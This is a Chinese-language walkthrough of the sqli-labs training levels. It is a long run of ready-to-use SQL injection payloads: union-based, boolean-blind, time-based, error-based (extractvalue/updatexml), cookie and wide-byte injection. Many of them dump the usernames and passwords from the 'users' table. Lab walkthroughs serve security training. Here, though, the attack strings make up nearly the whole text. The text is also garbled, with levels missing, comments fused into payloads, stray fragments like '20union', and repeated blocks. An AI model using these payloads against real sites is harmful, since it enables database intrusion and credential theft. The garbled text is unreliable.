这里建议联合第二关的剖析看
1.判断有无注入点
(1)通过.and 1 = 1
select * from user where name = $name and 1=1
(2).随便输入内容 报错即为有注入点,没报错就是没有注入点
2.猜解列名数目(字段数目)
order by+数字
3.报错,判断回显点
union
4.信息收集(越多越好)
收集数据库名,表明,字段名等等
5.使用对应的SQL注入
1.第一关
?id=-1' union select 1,version(),3 --+?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' --+?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = 'security' and table_name = 'users' --+?id=-1' union select 1,(select group_concat(username,0x3a,password)from users),3 --+
'and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10--+//逐一判断出表名?id=1
'and ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99--+//判断出所有列名的长度?id=1
'and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20--+//逐一判断出列名?id=1
'and ascii(mid((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>50--+
"and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10--+//逐一判断出表名?id=1
"and ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99--+//判断出所有列名的长度?id=1
"and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20--+//逐一判断出列名?id=1
"and ascii(mid((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>50--+
'))and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10--+//逐一判断出表名?id=1
'))and ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99--+//判断出所有列名的长度?id=1
'))and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20--+//逐一判断出列名?id=1
'))and ascii(mid((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>50--+
'and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10--+//逐一判断出表名?id=1
'and ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99--+//判断出所有列名的长度?id=1
'and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20--+//逐一判断出列名?id=1
'and ascii(mid((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>50--+
' and if(1=1,sleep(5),sleep(0)) --+//判断数据库名长度?id=1
' and if(length((select database()))>8,sleep(5),sleep(0)) --+//依次判断数据库名?id=1
' and if(ascii(mid((select database()),1,1))>115,sleep(5),sleep(0))--+//判断所有表名长度?id=1
' and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10,sleep(5),sleep(0)) --+//依次判断表名?id=1
' and if(ascii(mid((select group_concat(table_name)from information_schema.tables where table_schema=database()),1,1))>100,sleep(5),sleep(0)) --+//判断所有列名长度?id=1
' and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database()))>10,sleep(5),sleep(0)) --+//依次判断列名?id=1
' and if(ascii(mid((select group_concat(column_name)from information_schema.columns where table_schema=database()),1,1))>100,sleep(5),sleep(0)) --+
复制代码
10.第十关
跟第九关一致,唯一差别为数据类型为双引号
//先判断参数类型?id=1
" and if(1=1,sleep(5),sleep(0)) --+//判断数据库名长度?id=1
" and if(length((select database()))>8,sleep(5),sleep(0)) --+//依次判断数据库名?id=1
" and if(ascii(mid((select database()),1,1))>115,sleep(5),sleep(0))--+//判断所有表名长度?id=1
" and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10,sleep(5),sleep(0)) --+//依次判断表名?id=1
" and if(ascii(mid((select group_concat(table_name)from information_schema.tables where table_schema=database()),1,1))>100,sleep(5),sleep(0)) --+//判断所有列名长度?id=1
" and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database()))>10,sleep(5),sleep(0)) --+//依次判断列名?id=1
" and if(ascii(mid((select group_concat(column_name)from information_schema.columns where table_schema=database()),1,1))>100,sleep(5),sleep(0)) --+
uname=1' union select 1,database() --+&passwd=12345&submit=Submit
复制代码
//查询表名
uname=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema= 'security' --+&passwd=12345&submit=Submit
复制代码
//查询所有用户
uname=1' union select 1,group_concat(column_name) from information_schema.columns where table_name= 'users'and table_schema= 'security'--+&passwd=12345&submit=Submit
复制代码
//获取用户数据
uname=1' union select 1,(select group_concat(username,0x3a,password)from users) --+&passwd=242345&submit=Submit
uname=1") union select 1,database() --+&passwd=12345&submit=Submit
//查询表名
uname=1") union select 1,group_concat(table_name) from information_schema.tables where table_schema= 'security' --+&passwd=12345&submit=Submit
//查询所有用户
uname=1") union select 1,group_concat(column_name) from information_schema.columns where table_name= 'users'and table_schema= 'security'--+&passwd=12345&submit=Submit
//获取用户数据
uname=1") union select 1,(select group_concat(username,0x3a,password)from users) --+&passwd=242345&submit=Submit
uname=1') and extractvalue(1,concat(0x7e,(select database()))) --+&passwd=12345&submit=Submit
//查询表名
uname=1') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+&passwd=12345&submit=Submit
//查询所有用户
uname=1')and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database())))--+&passwd=12345&submit=Submit
//获取用户数据
uname=1')and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users ))) --+&passwd=242345&submit=Submit
复制代码
14.第十四关
跟第十三关大差不差,数据类型为双引号
//查询库名
uname=1" and extractvalue(1,concat(0x7e,(select database()))) --+&passwd=12345&submit=Submit
//查询表名
uname=1" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+&passwd=12345&submit=Submit
//查询所有用户
uname=1" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database())))--+&passwd=12345&submit=Submit
//获取用户数据
uname=1" and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users ))) --+&passwd=242345&submit=Submit
复制代码
15.第十五关
第十五关没有任何消息,所以采用布尔注入
//判断数据类型
uname=1' or 1=1--+&passwd=12345&submit=Submit
//判断数据库名的字符数
uname=1' or length((select database()))>10 --+&passwd=12345&submit=Submit
//判断数据库名的第一个字符是什么
uname=1' or ascii(mid((select database()),1,1))>115 --+&passwd=12345&submit=Submit
//判断出所有表名长度
uname=1' or length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10 --+&passwd=12345&submit=Submit
//逐一判断出表名
uname=1' or ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99 --+&passwd=12345&submit=Submit
//判断出所有列名的长度
uname=1' or length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20 --+&passwd=12345&submit=Submit
//逐一判断出列名
uname=1' or ascii(mid((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>50 --+&passwd=12345&submit=Submit
复制代码
16.第十六关
第十六关跟十五关差不多,均为布尔注入,数据类型为双引号加括号
//判断数据类型
uname=1") or 1=1--+&passwd=12345&submit=Submit
//判断数据库名的字符数
uname=1") or length((select database()))>10 --+&passwd=12345&submit=Submit
//判断数据库名的第一个字符是什么
uname=1") or ascii(mid((select database()),1,1))>115 --+&passwd=12345&submit=Submit
//判断出所有表名长度
uname=1") or length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10 --+&passwd=12345&submit=Submit
//逐一判断出表名
uname=1") or ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99 --+&passwd=12345&submit=Submit
//判断出所有列名的长度
uname=1") or length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20 --+&passwd=12345&submit=Submit
//逐一判断出列名
uname=1") or ascii(mid((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>50 --+&passwd=12345&submit=Submit
uname=admin&passwd=1' and (updatexml(1,concat(0x5c,database(),0x5c),1))#submit=Submit
//查询表名
uname=admin&passwd=1' and (updatexml(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c),1))#submit=Submit
//查询字段名
uname=admin&passwd=1' and (updatexml(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=database()),0x5c),1))#submit=Submit
1',updatexml(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c),1))#
//查找字段名
1',updatexml(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=database()),0x5c),1))#
//查找用户数据
1',updatexml(1,(select group_concat(username,0x5e,password) from users),1))#
复制代码
20.第二十关
当我们输入正确的账号密码时,页面发生变革
此时页面会弹出你的Cookie值,这里我们利用Cookie进行注入
用BP抓包,修改cookie值
Cookie: uname=-1' union select 1,2,database()#
复制代码
接下来的跟之前一样
//查询表名
Cookie: uname=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' #
//查询字段名
Cookie: uname=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = 'security' and table_name = 'users' #
//查询用户数据
Cookie: uname=-1' union select 1,(select group_concat(username,0x3a,password)from users),3 #
uname=-1%df' union select 1,database() #&passwd=12345&submit=Submit
//获取表名
uname=-1%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=12345&submit=Submit
//获取字段名
uname=-1%df' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database()#&passwd=12345&submit=Submit
//查询用户数据
uname=-1%df' union select 1,(select group_concat(username,0x3a,password)from users)#&passwd=12345&submit=Submit
复制代码
35.第三十五关
这里又回到了GET,但是这里为数字型,根本上与33关一致
//判断字段数目?id=-1 union select 1,2,3
,4 --+//获取数据库名?id=-1 union select 1,database(),3
--+//获取表名?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+//获取字段名?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name =0x7573657273 --+//查询用户数据?id=-1 union select 1,(select group_concat(username,0x3a,password)from users),3
--+
复制代码
36.第三十六关
与三十三关根本一致
//判断字段数量
?id=-1%df' union select 1,2,3,4 --+
//获取数据库名
?id=-1%df' union select 1,database(),3 --+
//获取表名
?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
//获取字段名
?id=-1%df' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name =0x7573657273 --+
//查询用户数据
?id=-1%df' union select 1,(select group_concat(username,0x3a,password)from users),3 --+
复制代码
37.第三十七关
又是POST类型,与三十四题一致
//获取数据库名
uname=-1%df' union select 1,database() #&passwd=12345&submit=Submit
//获取表名
uname=-1%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=12345&submit=Submit
//获取字段名
uname=-1%df' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database()#&passwd=12345&submit=Submit
//查询用户数据
uname=-1%df' union select 1,(select group_concat(username,0x3a,password)from users)#&passwd=12345&submit=Submit
复制代码
38.第三十八关
这一关并没有设防,与第一关差不多,单引号类型
//获取数据库名
?id=-1' 20union select 1,database(),3 --+
//获取表名
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' --+
//获取字段名
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = 'security' and table_name = 'users' --+
//查询用户数据
?id=-1' union select 1,(select group_concat(username,0x3a,password)from users),3 --+
复制代码
39.第三十九关
至此,Page2结束,开始Page3
这一关与第二关一致,数字型
//获取数据库名?id=-1 20union select 1,database(),3 //获取表名?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security'
//获取字段名?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = 'security' and table_name = 'users'
//查询用户数据?id=-1 union select 1,(select group_concat(username,0x3a,password)from users),3
复制代码
40.第四十关
数据类型为单引号,括号
//获取数据库名
?id=-1') 20union select 1,database(),3 --+
//获取表名
?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' --+
//获取字段名
?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = 'security' and table_name = 'users' --+
//查询用户数据
?id=-1') union select 1,(select group_concat(username,0x3a,password)from users),3 --+
复制代码
41.第四十一关
和三十九关一致
//获取数据库名?id=-1 20union select 1,database(),3 //获取表名?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security'
//获取字段名?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = 'security' and table_name = 'users'
//查询用户数据?id=-1 union select 1,(select group_concat(username,0x3a,password)from users),3
?sort=1 and ext ractvalue(1,concat(0x7e,(select database()))) --+
//查询表名
?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+
//查询所有用户
?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database())))--+
//获取用户数据
?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users ))) --+
复制代码
47.第四十七关
与第四十六关大抵相同,数据类型为单引号类型
//查询库名
?sort=1' and ext ractvalue(1,concat(0x7e,(select database()))) --+
//查询表名
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+
//查询所有用户
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database())))--+
//获取用户数据
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users ))) --+
复制代码
48.第四十八关
这里没有报错表现,数据类型为数字,我们用延时注入
//判断数据库名长度
?sort=1 and if(length((select database()))>8,sleep(5),sleep(0)) --+
//依次判断数据库名
?sort=1 and if(ascii(mid((select database()),1,1))>115,sleep(5),sleep(0))--+
//判断所有表名长度
?sort=1 and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10,sleep(5),sleep(0)) --+
//依次判断表名
?sort=1 and if(ascii(mid((select group_concat(table_name)from information_schema.tables where table_schema=database()),1,1))>100,sleep(5),sleep(0)) --+
//判断所有列名长度
?sort=1 and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database()))>10,sleep(5),sleep(0)) --+
//依次判断列名
?sort=1 and if(ascii(mid((select group_concat(column_name)from information_schema.columns where table_schema=database()),1,1))>100,sleep(5),sleep(0)) --+
复制代码
49.第四十九关
与四十八关一致,数据类型为单引号类型
//判断数据库名长度
?sort=1' and if(length((select database()))>8,sleep(5),sleep(0)) --+
//依次判断数据库名
?sort=1' and if(ascii(mid((select database()),1,1))>115,sleep(5),sleep(0))--+
//判断所有表名长度
?sort=1' and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10,sleep(5),sleep(0)) --+
//依次判断表名
?sort=1' and if(ascii(mid((select group_concat(table_name)from information_schema.tables where table_schema=database()),1,1))>100,sleep(5),sleep(0)) --+
//判断所有列名长度
?sort=1' and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database()))>10,sleep(5),sleep(0)) --+
//依次判断列名
?sort=1' and if(ascii(mid((select group_concat(column_name)from information_schema.columns where table_schema=database()),1,1))>100,sleep(5),sleep(0)) --+
复制代码
50.第五十关
与四十六关一致
//查询库名
?sort=1 and extractvalue(1,concat(0x7e,(select database()))) --+
//查询表名
?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+
//查询所有用户
?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database())))--+
//获取用户数据
?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users ))) --+
复制代码
51.第五十一关
与五十关一致,数据类型为单引号
//查询库名
?sort=1' and extractvalue(1,concat(0x7e,(select database()))) --+
//查询表名
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+
//查询所有用户
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database())))--+
//获取用户数据
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users ))) --+
复制代码
52.第五十二关
这一关数据类型为数字型,且没有报错表现,所以用延时注入
//判断数据库名长度
?sort=1 and if(length((select database()))>8,sleep(5),sleep(0)) --+
//依次判断数据库名
?sort=1 and if(ascii(mid((select database()),1,1))>115,sleep(5),sleep(0))--+
//判断所有表名长度
?sort=1 and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10,sleep(5),sleep(0)) --+
//依次判断表名
?sort=1 and if(ascii(mid((select group_concat(table_name)from information_schema.tables where table_schema=database()),1,1))>100,sleep(5),sleep(0)) --+
//判断所有列名长度
?sort=1 and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database()))>10,sleep(5),sleep(0)) --+
//依次判断列名
?sort=1 and if(ascii(mid((select group_concat(column_name)from information_schema.columns where table_schema=database()),1,1))>100,sleep(5),sleep(0)) --+
复制代码
53.第五十三关
与上一关相同,数据类型为单引号
//判断数据库名长度
?sort=1' and if(length((select database()))>8,sleep(5),sleep(0)) --+
//依次判断数据库名
?sort=1' and if(ascii(mid((select database()),1,1))>115,sleep(5),sleep(0))--+
//判断所有表名长度
?sort=1' and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10,sleep(5),sleep(0)) --+
//依次判断表名
?sort=1' and if(ascii(mid((select group_concat(table_name)from information_schema.tables where table_schema=database()),1,1))>100,sleep(5),sleep(0)) --+
//判断所有列名长度
?sort=1' and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database()))>10,sleep(5),sleep(0)) --+
//依次判断列名
?sort=1' and if(ascii(mid((select group_concat(column_name)from information_schema.columns where table_schema=database()),1,1))>100,sleep(5),sleep(0)) --+